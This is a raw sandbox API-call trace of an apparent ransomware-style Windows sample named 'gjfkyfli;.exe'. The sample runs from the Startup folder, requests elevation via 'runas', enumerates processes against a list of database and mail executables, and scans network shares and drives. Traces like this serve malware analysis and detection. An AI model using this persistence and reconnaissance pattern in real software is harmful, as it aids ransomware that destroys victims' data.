	[0171.430] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0171.430] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0171.430] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0171.430] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0171.430] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb617698 | out: hHeap=0x7ab0000) returned 1
	[0171.430] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x118
	[0171.432] Process32FirstW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0171.432] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0171.433] lstrlenW (lpString="System") returned 6
	[0171.433] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0171.433] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0171.433] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0171.433] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0171.433] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0171.433] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0171.433] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0171.433] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0171.433] lstrlenW (lpString="smss.exe") returned 8
	[0171.433] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0171.433] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0171.433] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0171.433] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0171.433] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0171.433] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0171.433] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0171.434] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0171.434] lstrlenW (lpString="csrss.exe") returned 9
	[0171.434] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0171.434] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0171.434] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0171.434] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0171.434] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0171.434] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0171.434] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0171.434] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0171.434] lstrlenW (lpString="wininit.exe") returned 11
	[0171.434] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0171.434] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0171.435] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0171.435] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0171.435] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0171.435] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0171.435] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0171.435] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0171.435] lstrlenW (lpString="csrss.exe") returned 9
	[0171.435] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0171.435] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0171.435] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0171.435] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0171.435] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0171.435] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0171.435] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0171.436] lstrlenW (lpString="winlogon.exe") returned 12
	[0171.436] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0171.436] lstrlenW (lpString="services.exe") returned 12
	[0171.436] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0171.436] lstrlenW (lpString="lsass.exe") returned 9
	[0171.436] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0171.437] lstrlenW (lpString="lsm.exe") returned 7
	[0171.437] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0171.437] lstrlenW (lpString="svchost.exe") returned 11
	[0171.437] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0171.438] lstrlenW (lpString="svchost.exe") returned 11
	[0171.438] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0171.438] lstrlenW (lpString="svchost.exe") returned 11
	[0171.438] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0171.438] lstrlenW (lpString="svchost.exe") returned 11
	[0171.438] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0171.439] lstrlenW (lpString="svchost.exe") returned 11
	[0171.439] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0171.439] lstrlenW (lpString="audiodg.exe") returned 11
	[0171.439] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0171.439] lstrlenW (lpString="svchost.exe") returned 11
	[0171.439] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0171.440] lstrlenW (lpString="svchost.exe") returned 11
	[0171.440] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0171.440] lstrlenW (lpString="spoolsv.exe") returned 11
	[0171.440] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0171.440] lstrlenW (lpString="svchost.exe") returned 11
	[0171.440] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0171.441] lstrlenW (lpString="taskhost.exe") returned 12
	[0171.441] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0171.441] lstrlenW (lpString="dwm.exe") returned 7
	[0171.441] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0171.441] lstrlenW (lpString="explorer.exe") returned 12
	[0171.442] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0171.442] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0171.442] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0171.442] lstrlenW (lpString="reader_sl.exe") returned 13
	[0171.442] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0171.443] lstrlenW (lpString="taskhost.exe") returned 12
	[0171.443] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0171.443] lstrlenW (lpString="dllhost.exe") returned 11
	[0171.443] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0171.443] lstrlenW (lpString="dllhost.exe") returned 11
	[0171.443] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1
	[0171.444] lstrlenW (lpString="rundll32.exe") returned 12
	[0171.444] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dinotify.exe")) returned 1
	[0171.444] lstrlenW (lpString="dinotify.exe") returned 12
	[0171.444] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0171.445] lstrlenW (lpString="dllhost.exe") returned 11
	[0171.445] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0171.445] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0171.445] Process32NextW (in: hSnapshot=0x118, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 0
	[0171.445] CloseHandle (hObject=0x118) returned 1
	[0171.445] Sleep (dwMilliseconds=0x1f4) 

Thread:
	id = 49
	os_tid = 0x73c

	[0136.791] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b585d8
	[0136.791] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b6b960
	[0136.792] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b58650
	[0136.792] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58650, Size=0x20) returned 0x7b42f88
	[0136.792] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b58650
	[0136.792] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58650, Size=0x20) returned 0x7b42fb0
	[0136.792] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0136.792] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0136.792] Wow64DisableWow64FsRedirection (in: OldValue=0x97cff28 | out: OldValue=0x97cff28*=0x0) returned 1
	[0136.792] lstrlenW (lpString="kernel32.dll") returned 12
	[0136.792] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b42f88 | out: hHeap=0x7ab0000) returned 1
	[0136.792] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0136.792] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b42fb0 | out: hHeap=0x7ab0000) returned 1
	[0136.792] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7b6b960, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe")) returned 0x69
	[0136.792] ShellExecuteExW (in: pExecInfo=0x97cff34*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", lpParameters="-a", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x97cff34*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", lpParameters="-a", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1
	[0169.269] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b58650
	[0169.269] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58650, Size=0x20) returned 0xb51c760
	[0169.269] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b58650
	[0169.269] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58650, Size=0x20) returned 0xb51c710
	[0169.269] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0169.269] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0169.269] Wow64DisableWow64FsRedirection (in: OldValue=0x0 | out: OldValue=0x0) returned 0
	[0169.271] lstrlenW (lpString="kernel32.dll") returned 12
	[0169.271] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb51c710 | out: hHeap=0x7ab0000) returned 1
	[0169.271] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0169.271] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb51c760 | out: hHeap=0x7ab0000) returned 1
	[0169.271] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b6b960 | out: hHeap=0x7ab0000) returned 1
	[0169.271] lstrlenW (lpString="runas") returned 5
	[0169.271] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b585d8 | out: hHeap=0x7ab0000) returned 1
	[0169.271] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0
	[0169.271] ReleaseMutex (hMutex=0x88) returned 1
	[0169.271] Sleep (dwMilliseconds=0x1f4) 
	[0169.827] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0
	[0169.827] ReleaseMutex (hMutex=0x88) returned 1
	[0169.827] Sleep (dwMilliseconds=0x1f4) 
	[0170.428] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0
	[0170.428] ReleaseMutex (hMutex=0x88) returned 1
	[0170.428] Sleep (dwMilliseconds=0x1f4) 
	[0171.226] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0
	[0171.226] ReleaseMutex (hMutex=0x88) returned 1
	[0171.226] Sleep (dwMilliseconds=0x1f4) 
	[0171.758] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x0
	[0171.758] ReleaseMutex (hMutex=0x88) returned 1
	[0171.758] Sleep (dwMilliseconds=0x1f4) 

Thread:
	id = 50
	os_tid = 0x740

	[0136.796] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b58668
	[0136.796] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58668, Size=0x20) returned 0x7b42fb0
	[0136.796] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b42fb0, Size=0x40) returned 0x7b20450
	[0136.796] GetLogicalDrives () returned 0x4
	[0136.796] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b7b968
	[0136.796] GetComputerNameW (in: lpBuffer=0x7b7b96c, nSize=0x98cff6c | out: lpBuffer="XDUWTFONO", nSize=0x98cff6c) returned 1
	[0136.796] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1000) returned 0x7b5ec60
	[0136.796] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x98cff3c | out: lphEnum=0x98cff3c*=0x7b41ec8) returned 0x0
	[0136.797] WNetEnumResourceW (in: hEnum=0x7b41ec8, lpcCount=0x98cff38, lpBuffer=0x7b5ec60, lpBufferSize=0x98cff40 | out: lpcCount=0x98cff38, lpBuffer=0x7b5ec60, lpBufferSize=0x98cff40) returned 0x103
	[0136.797] WNetCloseEnum (hEnum=0x7b41ec8) returned 0x0
	[0136.797] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x98cff3c | out: lphEnum=0x98cff3c*=0x7bafa08) returned 0x0
	[0137.376] WNetEnumResourceW (in: hEnum=0x7bafa08, lpcCount=0x98cff38, lpBuffer=0x7b5ec60, lpBufferSize=0x98cff40 | out: lpcCount=0x98cff38, lpBuffer=0x7b5ec60, lpBufferSize=0x98cff40) returned 0x0
	[0137.376] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1000) returned 0x7b643e8
	[0137.376] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x7b5ec60, lphEnum=0x98cff10 | out: lphEnum=0x98cff10*=0x7b42208) returned 0x0
	[0137.517] WNetEnumResourceW (in: hEnum=0x7b42208, lpcCount=0x98cff0c, lpBuffer=0x7b643e8, lpBufferSize=0x98cff14 | out: lpcCount=0x98cff0c, lpBuffer=0x7b643e8, lpBufferSize=0x98cff14) returned 0x103
	[0137.517] WNetCloseEnum (hEnum=0x7b42208) returned 0x0
	[0137.517] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1000) returned 0x7baa8c8
	[0137.517] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x7b5ec80, lphEnum=0x98cff10 | out: lphEnum=0x98cff10*=0x0) returned 0x4b8
	[0152.591] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1000) returned 0xb5eae88
	[0152.591] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x7b5eca0, lphEnum=0x98cff10 | out: lphEnum=0x98cff10*=0x0) returned 0x4c6
	[0152.592] WNetEnumResourceW (in: hEnum=0x7bafa08, lpcCount=0x98cff38, lpBuffer=0x7b5ec60, lpBufferSize=0x98cff40 | out: lpcCount=0x98cff38, lpBuffer=0x7b5ec60, lpBufferSize=0x98cff40) returned 0x103
	[0152.592] WNetCloseEnum (hEnum=0x7bafa08) returned 0x0
	[0152.592] GetLogicalDrives () returned 0x4
	[0152.592] Sleep (dwMilliseconds=0x64) 
	[0153.169] GetLogicalDrives () returned 0x4
	[0153.169] Sleep (dwMilliseconds=0x64) 
	[0153.338] GetLogicalDrives () returned 0x4
	[0153.338] Sleep (dwMilliseconds=0x64) 
	[0153.627] GetLogicalDrives () returned 0x4
	[0153.627] Sleep (dwMilliseconds=0x64) 
	[0154.144] GetLogicalDrives () returned 0x4
	[0154.145] Sleep (dwMilliseconds=0x64) 
	[0154.362] GetLogicalDrives () returned 0x4
	[0154.362] Sleep (dwMilliseconds=0x64) 
	[0154.494] GetLogicalDrives () returned 0x4
	[0154.494] Sleep (dwMilliseconds=0x64) 
	[0154.952] GetLogicalDrives () returned 0x4
	[0154.952] Sleep (dwMilliseconds=0x64) 
	[0155.278] GetLogicalDrives () returned 0x4
	[0155.278] Sleep (dwMilliseconds=0x64) 
	[0155.578] GetLogicalDrives () returned 0x4
	[0155.578] Sleep (dwMilliseconds=0x64) 
	[0155.855] GetLogicalDrives () returned 0x4
	[0155.855] Sleep (dwMilliseconds=0x64) 
	[0156.033] GetLogicalDrives () returned 0x4
	[0156.034] Sleep (dwMilliseconds=0x64) 
	[0156.517] GetLogicalDrives () returned 0x4
	[0156.517] Sleep (dwMilliseconds=0x64) 
	[0156.749] GetLogicalDrives () returned 0x4
	[0156.749] Sleep (dwMilliseconds=0x64) 
	[0156.904] GetLogicalDrives () returned 0x4
	[0156.904] Sleep (dwMilliseconds=0x64) 
	[0157.322] GetLogicalDrives () returned 0x4
	[0157.322] Sleep (dwMilliseconds=0x64) 
	[0157.584] GetLogicalDrives () returned 0x4
	[0157.584] Sleep (dwMilliseconds=0x64) 
	[0157.857] GetLogicalDrives () returned 0x4
	[0157.857] Sleep (dwMilliseconds=0x64) 
	[0158.081] GetLogicalDrives () returned 0x4
	[0158.081] Sleep (dwMilliseconds=0x64) 
	[0158.307] GetLogicalDrives () returned 0x4
	[0158.307] Sleep (dwMilliseconds=0x64) 
	[0158.617] GetLogicalDrives () returned 0x4
	[0158.617] Sleep (dwMilliseconds=0x64) 
	[0158.836] GetLogicalDrives () returned 0x4
	[0158.836] Sleep (dwMilliseconds=0x64) 
	[0159.405] GetLogicalDrives () returned 0x4
	[0159.405] Sleep (dwMilliseconds=0x64) 
	[0159.610] GetLogicalDrives () returned 0x4
	[0159.610] Sleep (dwMilliseconds=0x64) 
	[0159.927] GetLogicalDrives () returned 0x4
	[0159.927] Sleep (dwMilliseconds=0x64) 
	[0160.153] GetLogicalDrives () returned 0x4
	[0160.153] Sleep (dwMilliseconds=0x64) 
	[0160.442] GetLogicalDrives () returned 0x4
	[0160.442] Sleep (dwMilliseconds=0x64) 
	[0160.871] GetLogicalDrives () returned 0x4
	[0160.871] Sleep (dwMilliseconds=0x64) 
	[0161.493] GetLogicalDrives () returned 0x4
	[0161.493] Sleep (dwMilliseconds=0x64) 
	[0162.194] GetLogicalDrives () returned 0x4
	[0162.194] Sleep (dwMilliseconds=0x64) 
	[0162.480] GetLogicalDrives () returned 0x4
